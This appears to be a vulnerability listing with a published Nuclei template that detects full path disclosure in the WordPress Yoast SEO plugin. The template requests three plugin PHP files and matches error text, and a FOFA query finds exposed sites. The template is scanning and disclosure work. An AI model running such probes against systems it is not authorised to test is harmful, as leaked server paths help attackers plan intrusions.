漏洞描述
WordPress Yoast SEO plugin is vulnerable to full path disclosure via direct access to plugin files.
wp-yoast-seo-fpd: WordPress Yoast SEO - Full Path Disclosure
PoC代码[已公开]
id: wp-yoast-seo-fpd
info:
name: WordPress Yoast SEO - Full Path Disclosure
author: ritikchaddha
severity: low
description: |
WordPress Yoast SEO plugin is vulnerable to full path disclosure via direct access to plugin files.
reference:
- https://wordpress.org/plugins/wordpress-seo/
metadata:
verified: true
max-request: 3
vendor: yoast
product: wordpress-seo
framework: wordpress
fofa-query: body="/wp-content/plugins/wordpress-seo/"
tags: wp,wordpress,wp-plugin,fpd,yoast,seo,exposure
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wordpress-seo/src/main.php"
- "{{BaseURL}}/wp-content/plugins/wordpress-seo/admin/class-admin.php"
- "{{BaseURL}}/wp-content/plugins/wordpress-seo/inc/class-wpseo-utils.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Fatal error"
- "/plugins/wordpress-seo"
- "Uncaught TypeError:"
condition: and
- type: status
status:
- 200
# digest: 490a004630440220138b9c2610d82da518df2c990e8237f199e33bc7b0cc75a4a0f2243015f7d67102203a4e706c6162f6757c720111a45e019c84a1733bddf521a2621bfd08f7a1cb6a:922c64590222798bb761d5b6d8e72950